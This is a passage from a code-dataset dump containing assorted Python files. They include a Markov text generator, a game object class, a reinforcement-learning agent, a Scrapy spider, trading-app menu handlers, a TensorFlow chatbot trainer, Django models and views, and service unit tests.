print(sharpRatioDf)\n\n\n\nmain()\n\n\n\n\n","sub_path":"backtest/backtest/Main/BackTestMain20170301.py","file_name":"BackTestMain20170301.py","file_ext":"py","file_size_in_byte":23331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"369889366","text":"import numpy as np\nimport random\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"создание цепочки\")\nparser.add_argument(\"--model\", type=str, help=\"путь до модели\")\nparser.add_argument(\"--seed\", type=str, default=\"\", help=\"Начальное слово. Опционально\")\nparser.add_argument(\"--length\", type=int, help=\"Длина модели\")\nargs = parser.parse_args()\n\nmodel = args.model # указали путь к модели\nseed = args.seed\nlength = args.length\n\n# загрузка словаря\ndiction = dict()\nfirst_word = []\nwith open(model, \"r\", encoding=\"UTF-8\") as file:\n for line in file:\n line = line.split()\n word = line[0]\n next_word = line[1]\n frequency = int(line[2])\n if word not in first_word:\n first_word.append(word)\n if word in diction:\n diction[word].setdefault(next_word, frequency)\n else:\n diction.setdefault(word, {next_word: frequency})\n\nsize_first_word = len(first_word)\nif seed == \"\":\n rand = random.randint(0, size_first_word)\n seed = first_word[rand]\n\n# построение цепочки\nnew_text = [seed] # тут будут слова для последовательности\nfor i in range(length - 1):\n list_next_words = [] # тут будут слова, которые могут идти после\n if new_text[i] not in diction: # если последнего слова нет в словаре, то берем случайное\n rand = random.randint(0, size_first_word)\n new_text.append(first_word[rand])\n continue\n frequency = [] # частота соответствующая слову в list_next_words\n number = 0 # сумма частот в list_next_words\n for two_word in diction[new_text[i]]: # пробега��мся по всем вторым словам\n number += diction[new_text[i]][two_word] # считаем общую частоту\n list_next_words.append(two_word) # добавили из словаря возможное следующее слово\n for j in range(len(list_next_words)): # расставим частоту\n frequency.append(diction[new_text[i]][list_next_words[j]] / number) # расставили частоту\n np.random.choice(list_next_words, len(list_next_words), frequency) # рандом. перемешивание\n selected_word = list_next_words[0] # выбрали слово\n new_text.append(selected_word) # добавили его\nfor words in new_text:\n print(words, end=\" \")\nprint()\n","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"388134232","text":"class GameObject(object):\n #Border Behaviours\n NONE = 0\n STOP = 1\n WRAP = 2\n BOUNCE = 3\n DIE = 4\n \n #Color of ships\n COLOR_BLUE = 0\n COLOR_RED = 1\n COLOR_GREEN = 2\n COLOR_YELLOW = 3\n #Type of GameObjects\n TYPE_ENEMY = 0\n TYPE_PLAYER = 1\n TYPE_PROYECTILE = 2\n def __init__(self):\n self.mX = 0\n self.mY = 0\n self.mMinX = 0\n self.mMaxX = 0\n self.mMinY = 0\n self.mMaxY = 0\n self.mVelX = 0\n self.mVelY = 0\n self.mAccelX = 0\n self.mAccelY = 0\n self.mBoundAction = GameObject.NONE\n self.mIsDead = False\n self.mState = 0\n self.mTimeState = 0\n #Defines border behaviour\n def setBoundAction(self, aBoundAction):\n self.mBoundAction = aBoundAction\n\n def checkBounds(self):\n #If none, we don't check border collision\n if (self.mBoundAction == GameObject.NONE):\n return\n #Which borders we are touching\n left = (self.mX < self.mMinX)\n right = (self.mX > self.mMaxX)\n up = (self.mY < self.mMinY)\n down = (self.mY > self.mMaxY)\n \n #If no collisions, we don't do anything\n if not (left or right or up or down):\n return\n if (self.mBoundAction == GameObject.WRAP):\n if(left):\n self.mX = self.mMaxX\n if(right):\n self.mX = self.mMinX\n if(up):\n self.mY = self.mMaxY\n if(down):\n self.mY = self.mMinY\n #If Action is STOP,BOUNCE, or DIE we correct position otherwise object\n #remains out of bounds\n else:\n if(left):\n self.mX = self.mMinX\n if(right):\n self.mX = self.mMaxX\n if(up):\n self.mY = self.mMinY\n if(down):\n self.mY = self.mMaxY\n\n if(self.mBoundAction == GameObject.STOP or self.mBoundAction == GameObject.DIE):\n self.mVelX = 0\n self.mVelY = 0\n \n elif(self.mBoundAction == GameObject.BOUNCE):\n if (left or right):\n self.mVelX *= -1\n if (up or down):\n self.mVelY *= -1\n if(self.mBoundAction == GameObject.DIE):\n self.mIsDead = True\n return\n \n def die(self):\n self.mIsDead = True\n \n def isDead(self):\n return self.mIsDead\n \n def setVelXY(self,aVelX,aVelY):\n self.mVelX = aVelX\n self.mVelY = aVelY\n\n def setVelX(self,aVelX):\n self.mVelX = aVelX\n\n def setVelY(self,aVelY):\n self.mVelY = aVelY\n\n def getVelX(self):\n return self.mVelX\n\n def getVelY(self):\n return self.mVelY\n \n def stopMove(self):\n self.mVelX = 0\n self.mVelY = 0\n self.mAccelX = 0\n self.mAccelY = 0\n \n def setAccel(self,aAccelX,aAccelY):\n self.mAccelX = self.aAccelX\n self.mAccelY = self.aAccelY\n \n def setXY(self,aX,aY):\n\n self.mX = aX\n self.mY = aY\n\n def setX(self,aX):\n self.mX = aX\n\n def setY(self,aY):\n self.mY = aY\n \n def setBounds(self,aMinX,aMaxX,aMinY,aMaxY):\n\n self.mMinX = aMinX\n self.mMaxX = aMaxX\n self.mMinY = aMinY\n self.mMaxY = aMaxY\n \n def getX(self):\n return self.mX\n\n def getY(self):\n return self.mY\n\n def getState(self):\n return self.mState\n\n def setState(self, aState):\n self.mState = aState\n self.mTimeState = 0\n\n def getTimeState(self):\n return self.mTimeState\n\n def update(self):\n self.mTimeState = self.mTimeState + 1\n self.mVelX = self.mVelX + self.mAccelX\n self.mVelY = self.mVelY + self.mAccelY\n self.mX += self.mVelX\n self.mY += self.mVelY\n self.checkBounds()\n \n def destroy(self):\n pass\n\n \n \n","sub_path":"api/GameObject.py","file_name":"GameObject.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"158440432","text":"import sys\nfrom collections import defaultdict\nimport itertools\nfrom gym import make\nimport gym_workflow.envs\nimport agents.utils.plotting as plt\nfrom collections import namedtuple\nimport numpy as np\n\nif __name__ == '__main__':\n\t# Author: dennybritz\n\t# From URL: https://github.com/dennybritz/reinforcement-learning/blob/master/MC/MC%20Prediction%20Solution.ipynb\n\tdef mc_prediction(policy, env, num_episodes, discount_factor=1.0):\n\t\t\"\"\"\n\t\t\tMonte Carlo prediction algorithm. Calculates the value function\n\t\t\tfor a given policy using sampling.\n\n\t\t\tArgs:\n\t\t\t\tpolicy: A function that maps an observation to action probabilities.\n\t\t\t\tenv: OpenAI gym environment.\n\t\t\t\tnum_episodes: Number of episodes to sample.\n\t\t\t\tdiscount_factor: Gamma discount factor.\n\n\t\t\tReturns:\n\t\t\t\tA dictionary that maps from state -> value.\n\t\t\t\tThe state is a tuple and the value is a float.\n\t\t\"\"\"\n\t\t# Keeps track of sum and count of returns for each state\n\t\t# to calculate an average. We could use an array to save all\n\t\t# returns (like in the book) but that's memory inefficient.\n\t\treturns_sum = defaultdict(float)\n\t\treturns_count = defaultdict(float)\n\n\t\t# The publication value function\n\t\tV = defaultdict(float)\n\n\t\t# EpisodeStats = namedtuple(\"Stats\", [\"episode_states\", \"episode_actions\", \"episode_rewards\"])\n\t\t# stats = EpisodeStats(\n\t\t# \tepisode_states=np.zeros(num_episodes),\n\t\t# \tepisode_actions=np.zeros(num_episodes),\n\t\t# \tepisode_rewards=np.zeros(num_episodes)\n\t\t# )\n\n\t\tfor i_episode in range(1, num_episodes + 1):\n\t\t\t# Print out which episode we're on, useful for debugging.\n\t\t\tif i_episode % 1000 == 0:\n\t\t\t\tprint(\"\\rEpisode {}/{}.\".format(i_episode, num_episodes), end=\"\")\n\t\t\t\tsys.stdout.flush()\n\n\t\t\t# Generate an episode.\n\t\t\t# An episode is an array of (state, action, reward) tuples\n\t\t\tepisode = []\n\t\t\tstate = env.reset()\n\t\t\tfor t in range(100):\n\t\t\t\taction = policy(state, env)\n\t\t\t\tnext_state, reward, done, _ = env.step(action)\n\t\t\t\tepisode.append((next_state, action, reward))\n\t\t\t\t# stats.episode_states[i_episode] = state\n\t\t\t\t# stats.episode_actions[i_episode] = action\n\t\t\t\t# stats.episode_rewards[i_episode] = reward\n\t\t\t\tif done:\n\t\t\t\t\tbreak\n\t\t\t\tstate = next_state\n\n\t\t\t# Find all states the we've visited in this episode\n\t\t\t# We convert each state to a tuple so that we can use it as a dict key\n\t\t\tstates_in_episode = set([tuple(x[0]) for x in episode])\n\t\t\tfor state in states_in_episode:\n\t\t\t\t# Find the first occurance of the state in the episode\n\t\t\t\tfirst_occurence_idx = next(i for i, x in enumerate(episode) if x[0] == state)\n\t\t\t\t# Sum up all rewards since the first occurance\n\t\t\t\tG = sum([x[2] * (discount_factor ** i) for i, x in enumerate(episode[first_occurence_idx:])])\n\t\t\t\t# Calculate average return for this state over all sampled episodes\n\t\t\t\treturns_sum[state] += G\n\t\t\t\treturns_count[state] += 1.0\n\t\t\t\tV[state] = returns_sum[state] / returns_count[state]\n\n\t\treturn V\n\n\n\tdef wf_policy(observation, env):\n\t\t# Depend on the observation what actions I should be doing\n\t\t# cs, cn, im = observation\n\n\t\treturn env.action_space.sample()\n\t\n\t\n\tenv = make('Montage-v3')\n\tepisodes = 10000\n\n\tV_10k = mc_prediction(wf_policy, env, num_episodes=episodes)\n\tprint(V_10k)\n\t\n\tplt.plot_value_function(V_10k, title=\"Monte Carlo First Visit with {} episodes\".format(100000))\n","sub_path":"agents/mc_fv_agent.py","file_name":"mc_fv_agent.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"640242173","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom urllib.parse import quote\nfrom scrapy import Request\nfrom scrapyseleiumtest.items import ProductItem\n\nclass TaobaoSpider(scrapy.Spider):\n name = 'taobao'\n allowed_domains = ['s.taobao.com']\n base_url = 'https://s.taobao.com/search?q='\n\n def start_requests(self):\n for keyword in self.settings.get('KEYWORDS'):\n for page in range(1, self.settings.get('MAX_PAGE') + 1):\n url = self.base_url + quote(keyword)\n yield Request(url=url, callback=self.parse, meta={'page': page}, dont_filter=True)\n\n\n def parse(self, response):\n products = response.css('div.grid-item.col')\n for product in products:\n item = ProductItem()\n item['price'] = product.css('.info-cont span.price.g_price.g_price-highlight strong::text').extract_first(),\n item['title'] = product.css('.info-cont .title-row a::attr(title)').extract_first()\n item['deal'] = product.css('.info-cont .col.end span.week-sale .num::text').extract_first()\n yield item\n\n\n","sub_path":"爬虫框架/Scrapy/scrapyseleiumtest/scrapyseleiumtest/spiders/taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"640337712","text":"\"\"\" Compiled: 2020-09-18 10:38:55 \"\"\"\n\n#__src_file__ = \"extensions/PortfolioViewer/etc/PortfolioViewerMenuItems.py\"\n\"\"\"--------------------------------------------------------------------------\nMODULE\n PortfolioViewerMenuItems\n\n (c) Copyright 2016 SunGard FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n \tModule containing the code for the menu items used in ribbons and \n right click menus in the Portfolio Viewer application.\n-----------------------------------------------------------------------------\"\"\"\n\nimport FUxCore\nimport acm\nimport PortfolioViewerDialogs\nimport PortfolioViewerFunctions\nimport PortfolioViewerConditionsDlg as ConditionalFunctions\n\n\"\"\" --- Class that handles ribbons and actions --- \"\"\"\nclass MenuItems(FUxCore.MenuItem):\n def __init__(self):\n self.m_application = None\n \n def Invoke(self, cd):\n commandName = cd.Definition().GetName().Text()\n if commandName == 'ViewSettings':\n PortfolioViewerFunctions.OpenSettings(self.m_application)\n\n #Column commands\n elif commandName == 'columnSelection_list':\n if self.m_application.userSettings.At('defDataType') == 'Portfolio':\n PortfolioViewerFunctions.ColumnSelection(self.m_application, 'Portfolio')\n else:\n PortfolioViewerFunctions.ColumnSelection(self.m_application, 'Depot')\n elif commandName == 'columnsSelection_clnt':\n PortfolioViewerFunctions.ColumnSelection(self.m_application, 'Client')\n elif commandName == 'columnSelection_cond':\n PortfolioViewerFunctions.ColumnSelection(self.m_application, 'Condition')\n \n #Create new commands\n elif commandName == 'new_prfOrDepot':\n if self.m_application.userSettings.At('defDataType') == 'Portfolio':\n if PortfolioViewerDialogs.StartCreationDialog(self.m_application, None): #Portfolio created\n PortfolioViewerFunctions.PortfolioSearch(self.m_application, None) #Reload results\n elif self.m_application.userSettings.At('defDataType') == 'Depot':\n acm.UX().SessionManager().StartApplication('Party Definition', None)\n elif commandName == 'new_condition':\n if ConditionalFunctions.StartNewConditionDlg(self.m_application):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n\n elif commandName == 'ClearFields':\n PortfolioViewerFunctions.clearAllFields(self.m_application)\n elif commandName == 'DoSearch':\n if self.m_application.userSettings.At('defDataType') == 'Portfolio':\n PortfolioViewerFunctions.PortfolioSearch(self.m_application, None)\n elif self.m_application.userSettings.At('defDataType') == 'Depot':\n PortfolioViewerFunctions.PartySearch(self.m_application, None)\n elif commandName == 'CondModels':\n acm.UX().SessionManager().StartApplication('Charges', None)\n\n #portfolio right click commands\n elif commandName == 'setCompoundNode':\n PortfolioViewerFunctions.SetCompoundNode(self.m_application, None)\n elif commandName == 'openInAdminConsole':\n PortfolioViewerFunctions.OpenConditionCustom(self.m_application, True)\n elif commandName == 'openPortfolio':\n PortfolioViewerFunctions.OpenPortfolio(self.m_application, None)\n \n #client and depot right click commands\n elif commandName == 'ClientGroups':\n acm.UX().SessionManager().StartApplication('Party Groups', acm.FPartyGroup[cd.Definition().GetTooltip().Text()])\n elif commandName == 'newDepotWParent':\n if PortfolioViewerDialogs.NewDepotDlg(self.m_application):\n PortfolioViewerFunctions.PartySearch(self.m_application, None)\n\n #Shared right click commands (portfolio and depot)\n elif commandName == 'showConditions':\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n \n #Conditions and commissions\n elif commandName == 'openSelCondition':\n PortfolioViewerFunctions.OpenConditionCustom(self.m_application, None)\n elif commandName == 'newPrfCondition':\n if PortfolioViewerFunctions.NewPortfolioCondition(self.m_application, None):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n elif commandName == 'newDepCondition':\n if PortfolioViewerFunctions.NewPartyCondition(self.m_application, None):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n elif commandName == 'newCondforModel':\n if ConditionalFunctions.OpenConditionDlg(self.m_application, self.m_application.treeView.GetSelectedItem().GetData(), None):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n\n elif commandName == 'copyConditions':\n PortfolioViewerFunctions.CopyConditionsFrom(self.m_application)\n\n # Condition overview commands\n elif commandName == 'overviewModelsUpdateCondition':\n model = acm.FConditionalValueModel[cd.Definition().GetTooltip().Text()]\n if PortfolioViewerFunctions.ChangeConditionValue(self.m_application, model):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n elif commandName == 'overviewModelsSpecialCondition':\n model = acm.FConditionalValueModel[cd.Definition().GetTooltip().Text()]\n if PortfolioViewerFunctions.NewOverviewCondition(self.m_application, model):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n elif commandName == 'overviewModelsDefaultCondition':\n model = acm.FConditionalValueModel[cd.Definition().GetTooltip().Text()]\n if ConditionalFunctions.OpenConditionDlg(self.m_application, model, None):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n\n else: \n pass\n \n def Applicable(self):\n return True\n\n def Enabled(self):\n return True\n\n def Checked(self):\n return False\n\n def SetApplication(self, application):\n self.m_application = application\n\nclass TypeMenuItems(FUxCore.MenuItem):\n def __init__(self):\n self.m_application = None\n self.checked = False\n \n def Invoke(self, cd):\n commandName = cd.Definition().GetName().Text()\n if commandName == 'use_Portfolio':\n self.m_application.userSettings.AtPut('defDataType', 'Portfolio')\n PortfolioViewerFunctions.ChangeType(self.m_application, None)\n elif commandName == 'use_Depot':\n self.m_application.userSettings.AtPut('defDataType', 'Depot')\n PortfolioViewerFunctions.ChangeType(self.m_application, None)\n else: \n pass\n \n def Applicable(self):\n return True\n\n def Checked(self):\n return self.checked\n\n def SetApplication(self, application):\n self.m_application = application\n\n\"\"\" End of file \"\"\"\n","sub_path":"Extensions/Portfolio Viewer/FPythonCode/PortfolioViewerMenuItems.py","file_name":"PortfolioViewerMenuItems.py","file_ext":"py","file_size_in_byte":7184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"354153555","text":"# Things we need for NLP\nimport nltk\nfrom chatbot.utils import lemmatize_words\n\n# Things we need for Tensorflow\nimport numpy as np\nimport tflearn\nimport tensorflow as tf\nimport random\n\nimport json\nimport pickle\nfrom service_api import constant as ct\n\n\ndef create_chatbot_data():\n\n with open(ct.INTENTS_JSON) as json_data:\n intents = json.load(json_data)\n\n words = []\n classes = []\n documents = []\n\n for intent in intents[ct.INTENTS]:\n for pattern in intent[ct.PATTERNS]:\n w = nltk.word_tokenize(pattern)\n words.extend(w)\n documents.append((w, intent[ct.TAG]))\n if intent[ct.TAG] not in classes:\n classes.append(intent[ct.TAG])\n\n words = lemmatize_words([w.lower() for w in words])\n words = sorted(list(set(words)))\n\n classes = sorted(list(set(classes)))\n\n print(len(documents), 'documents')\n print(len(classes), 'classes', classes)\n print(len(words), 'unique lemmatized words', words)\n\n training = []\n\n output_empty = [0] * len(classes)\n\n for doc in documents:\n bag = []\n pattern_words = doc[0]\n pattern_words = lemmatize_words([w.lower() for w in pattern_words])\n for w in words:\n bag.append(1) if w in pattern_words else bag.append(0)\n\n output_row = list(output_empty)\n output_row[classes.index(doc[1])] = 1\n\n training.append([bag, output_row])\n\n random.shuffle(training)\n training = np.array(training)\n\n train_x = list(training[:, 0])\n train_y = list(training[:, 1])\n\n tf.reset_default_graph()\n net = tflearn.input_data(shape=[None, len(train_x[0])])\n net = tflearn.fully_connected(net, 8)\n net = tflearn.fully_connected(net, 8)\n net = tflearn.fully_connected(net, len(train_y[0]), activation=ct.SOFTMAX)\n net = tflearn.regression(net)\n\n model = tflearn.DNN(net, tensorboard_dir=ct.TF_LOGS)\n model.fit(train_x, train_y, n_epoch=1000, batch_size=8, show_metric=True)\n model.save(ct.MODEL_TF)\n\n pickle.dump({ct.WORDS: words, ct.CLASSES: classes, ct.TRAIN_X: train_x, ct.TRAIN_Y: train_y},\n open(ct.TRAINING_DATA, \"wb\"))\n\n\ndef main():\n create_chatbot_data()\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"chatbot/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"600621593","text":"# https://www.reddit.com/r/dailyprogrammer/comments/3r7wxz/20151102_challenge_239_easy_a_game_of_threes/\n\nimport sys\nimport random\n\ntry:\n number = int(sys.argv[1])\nexcept ValueError:\n print(\"You must enter an integer.\")\n sys.exit(0)\n\nwhile number > 1:\n if number % 3 == 0:\n number /= 3\n print('{:.0f} 0'.format(number))\n else:\n add = random.choice([1, -1])\n number += add\n print('{:.0f} {}'.format(number, add))\nprint(\"{:.0f}\".format(number))\n","sub_path":"Python/Easy/E239.py","file_name":"E239.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"294385381","text":"from django.db import models\n\n\n# Create your models here.\n\nclass Recipe(models.Model):\n \"\"\"docstring for Post\"\"\"\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=2000)\n author = models.ForeignKey('auth.User')\n ingredients = models.TextField(null=True)\n likes = models.IntegerField(default=0)\n views = models.IntegerField(default=0)\n published_date = models.DateTimeField(\n blank=True, null=True)\n\n def __str__(self):\n return self.name\n\n def increment_views(self):\n self.views += 1\n self.save()\n\n def increment_likes(self):\n self.likes += 1\n self.save()\n\n def decrement_likes(self):\n self.likes -= 1\n self.save()\n\n","sub_path":"foody/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"391561885","text":"\"\"\"\nProblem link: https://codingcompetitions.withgoogle.com/kickstart/round/0000000000434c0e/0000000000434ba7\n\"\"\"\nT = int(input())\n\nfor test_case in range(T):\n\n N = int(input())\n skater_name = [input() for card_num in range(N)]\n\n alpha_num = {\n \" \": 1,\n\n \"A\": 2,\n \"B\": 3,\n \"C\": 4,\n \"D\": 5,\n \"E\": 6,\n \"F\": 7,\n \"G\": 8,\n \"H\": 9,\n \"I\": 10,\n \"J\": 11,\n \"K\": 12,\n \"L\": 13,\n \"M\": 14,\n \"N\": 15,\n \"O\": 16,\n \"P\": 17,\n \"Q\": 18,\n \"R\": 19,\n \"S\": 20,\n \"T\": 21,\n \"U\": 22,\n \"V\": 23,\n \"W\": 24,\n \"X\": 25,\n \"Y\": 26,\n \"Z\": 27,\n\n \"a\": 28,\n \"b\": 29,\n \"c\": 30,\n \"d\": 31,\n \"e\": 32,\n \"f\": 33,\n \"g\": 34,\n \"h\": 35,\n \"i\": 36,\n \"j\": 37,\n \"k\": 38,\n \"l\": 39,\n \"m\": 40,\n \"n\": 41,\n \"o\": 42,\n \"p\": 43,\n \"q\": 44,\n \"r\": 45,\n \"s\": 46,\n \"t\": 47,\n \"u\": 48,\n \"v\": 49,\n \"w\": 50,\n \"x\": 51,\n \"y\": 52,\n \"z\": 53\n }\n\n name_value_pairs = {}\n\n for name in skater_name:\n value = \"\"\n for alph in name:\n value += str(alpha_num.get(alph))\n\n name_value_pairs[int(value)] = name\n\n sorted_dict = {\n k: v for k, v in sorted(name_value_pairs.items(), key=lambda item: item[1])\n }\n\n sorted_list = [name for name in sorted_dict.values()]\n changes = 0\n\n for index in range(len(sorted_list)):\n if sorted_list[index] != skater_name[index]:\n changes += 0.5\n\n print(\"Case #{}: {}\".format(test_case + 1, int(changes)))\n","sub_path":"2015/Practice Round/moist.py","file_name":"moist.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"180858268","text":"import sys\nimport os\nPROJECT_HOME = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '../../'))\nsys.path.append(PROJECT_HOME)\nfrom flask.ext.testing import TestCase\nfrom flask import url_for, Flask\nfrom models import db, GraphicsModel\nfrom sqlalchemy import Column, Integer, String, DateTime, Boolean\nfrom sqlalchemy.dialects import postgresql\nimport unittest\nimport requests\nimport app\nimport mock\nimport json\nfrom datetime import datetime\n\n\ndef get_testdata():\n global figures\n figures = [{\"images\": [{\"image_id\": \"fg1\", \"format\": \"gif\",\n \"thumbnail\": \"fg1_thumb_url\", \"highres\":\n \"fg1_highres_url\"}],\n \"figure_caption\": \"Figure 1\",\n \"figure_label\": \"Figure 1\",\n \"figure_id\": \"fg1\"}]\n g = GraphicsModel(\n bibcode='9999BBBBBVVVVQPPPPI',\n doi='DOI',\n source='TEST',\n eprint=False,\n figures=figures,\n modtime=datetime.now()\n )\n return g\n\n\nclass TestExpectedResults(TestCase):\n\n def create_app(self):\n '''Create the wsgi application'''\n app_ = app.create_app()\n db.session = mock.Mock()\n one = db.session.query.return_value.filter.return_value.one\n one.return_value = get_testdata()\n return app_\n\n def test_data_model(self):\n '''Check that data model for graphics is what we expect'''\n ic = Column(Integer)\n sc = Column(String)\n bc = Column(Boolean)\n jc = Column(postgresql.JSON)\n dc = Column(DateTime)\n cols_expect = map(\n type, [ic.type, sc.type, sc.type, sc.type, bc.type,\n jc.type, dc.type])\n self.assertEqual([type(c.type)\n for c in GraphicsModel.__table__.columns],\n cols_expect)\n\n def test_query_1(self):\n '''Check that session mock behaves the way we set it up'''\n expected_attribs = ['modtime', 'bibcode', 'source',\n '_sa_instance_state', 'eprint',\n 'figures', 'id', 'doi']\n resp = db.session.query(GraphicsModel).filter(\n GraphicsModel.bibcode == '9999BBBBBVVVVQPPPPI').one()\n self.assertEqual(resp.__dict__.keys().sort(), expected_attribs.sort())\n\n def test_query(self):\n '''Query endpoint with bibcode from stub data should\n return expected results'''\n url = url_for('graphics', bibcode='9999BBBBBVVVVQPPPPI')\n r = self.client.get(url)\n self.assertTrue(r.status_code == 200)\n self.assertTrue(r.json.get('figures') == figures)\n self.assertTrue(r.json.get('bibcode') == '9999BBBBBVVVVQPPPPI')\n self.assertTrue(r.json.get('pick')['figure_label'] == 'Figure 1')\n\n\nclass TestDatabaseError(TestCase):\n\n def create_app(self):\n '''Create the wsgi application'''\n app_ = app.create_app()\n db.session = mock.Mock()\n one = db.session.query.return_value.filter.return_value.one\n one.return_value = Exception()\n return app_\n\n def test_query(self):\n ''''An exception is returned representing the absence of\n a database connection'''\n url = url_for('graphics', bibcode='9999BBBBBVVVVQPPPPI')\n r = self.client.get(url)\n self.assertTrue(r.status_code == 500)\n\n\nclass TestJSONError(TestCase):\n\n def create_app(self):\n '''Create the wsgi application'''\n app_ = app.create_app()\n db.session = mock.Mock()\n one = db.session.query.return_value.filter.return_value.one\n one.return_value = 'a'\n return app_\n\n def test_query(self):\n ''''An exception is returned when something goes wrong\n with JSON handling'''\n url = url_for('graphics', bibcode='9999BBBBBVVVVQPPPPI')\n r = self.client.get(url)\n self.assertTrue(r.status_code == 500)\n\n\nclass TestNoDataReturned(TestCase):\n\n def create_app(self):\n '''Create the wsgi application'''\n app_ = app.create_app()\n db.session = mock.Mock()\n one = db.session.query.return_value.filter.return_value.one\n one.return_value = {'figures': []}\n return app_\n\n def test_query(self):\n ''''An exception is returned when no row is found in database'''\n url = url_for('graphics', bibcode='9999BBBBBVVVVQPPPPI')\n r = self.client.get(url)\n self.assertTrue(r.status_code == 200)\n self.assertTrue('Error' in r.json)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"service/tests/unittests/testEndpoint.py","file_name":"testEndpoint.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"28557229","text":"import time\n\nimport cv2\nimport numpy as np\nimport os\n# import matplotlib.pyplot as plt\n\nstepbystep = True\n\nmask = np.loadtxt('/home/jelle/PycharmProjects/UTMR/mask.txt')\nkernel = cv2.getStructuringElement(shape=0, ksize=(2, 2))\nmask = cv2.morphologyEx(mask, cv2.MORPH_GRADIENT, kernel)\n\nthelist = [(81, 76), (85, 83), (89, 91), (91, 99), (93, 107), (94, 115), (95, 123), (95, 130), (95, 138), (94, 146),\n (93, 154), (92, 162), (90, 170), (89, 177), (88, 185), (86, 193), (85, 201), (83, 209), (82, 217), (80, 225)]\n\n\"\"\"\"\nWhat is the concept:\n -remake dist determine\n\"\"\"\n\n\n\n\ndef dist_determine(point,mask):\n xcent, ycent = point\n\n # instead of drawing a full circle, draw a spare one, consisting of 4 lines at\n # 0 degree (horizontal)\n # 30 degree\n # 60 degree\n # 90 degree (vertical)\n\n # predefine so we are FAST!\n # remember x = r*cos(theta) and y = r*sin(theta)\n val1 = 0.866 # cos(30), sin(60) sqrt(3)/2\n val2 = 0.5 # cos(60), sin(30)\n\n points = [tuple, tuple, tuple,\n tuple, tuple, tuple,\n tuple, tuple, tuple,\n tuple, tuple, tuple]\n\n for r in range(1,100): # r for radius\n sq = int(val1 * r)\n h = int(val2 * r)\n # quadrant 1\n points[0] = (r+xcent, 0+ycent)\n points[1] = (sq+xcent,h+ycent)\n points[2] = (h+xcent,sq+ycent)\n # quadrant 2\n points[3] = (0+xcent,r+ycent)\n points[4] = (-sq+xcent,h+ycent)\n points[5] = (-h+xcent,sq+ycent)\n # quadrant 3\n points[6] = (-r+xcent,0+ycent)\n points[7] = (-sq+xcent,-h+ycent)\n points[8] = (-h+xcent,-sq+ycent)\n # quadrant 4\n points[9] = (0+xcent,-r+ycent)\n points[10] = (h+xcent,-sq+ycent)\n points[11] = (sq+xcent,-h+ycent)\n\n if r > 24:\n print(points)\n\n for ii in range(11):\n # gotta switch em w.r.t. array!\n if mask[(points[ii][1],points[ii][0])] == 255:\n return points[ii],r\n\n\nprint(dist_determine(thelist[0],mask))\n\nvmask = np.copy(mask)\n\nif stepbystep:\n for element in thelist:\n mask = cv2.circle(mask,element,5,255)\n print(f\"doing point{element}\")\n # There should be a better method than passing the entire mask all the time\n _, pointz = dist_determine(element,vmask)\n mask = cv2.line(mask,element,pointz,255)\n\n cv2.imshow('cirq',mask)\n cv2.waitKey(0)\n\n\ndef display_time():\n # in the case of SMALL opps, python is a few orders faster than numpy ;-)\n t1 = time.perf_counter()\n for i in range(1000):\n a = np.array([5.24])\n b = a\n c=a+b\n t2 = time.perf_counter()\n\n t3 = time.perf_counter()\n for i in range(1000):\n a = 5.24\n b = a\n c=a+b\n t4 = time.perf_counter()\n\n print(f\"numpy took {t2-t1}, and python {t4-t3}\")","sub_path":"prototype/sanbox/from_scratch.py","file_name":"from_scratch.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"279149403","text":"from django.shortcuts import render\n\nfrom src.PlaceHelper import PlaceHelper\nfrom src.Requests import Requests\nfrom src.SearchValidation import SearchValidation\n\n\ndef index(request):\n return render(request, \"templates/index.html\")\n\n\ndef search(request):\n\n place_name = request.GET[\"place_name\"]\n place_type = request.GET[\"place_type\"]\n nearby_places = request.GET[\"nearby_places\"]\n\n message = SearchValidation.validate_place_name(place_name)\n\n if message[\"warning_message\"] == \"\":\n json = Requests.request_recife_metropolitan_area_places(place_name, place_type)\n PlaceHelper.extract_places(json)\n return render(request, \"templates/search.html\",\n {\"places\": PlaceHelper.places})\n 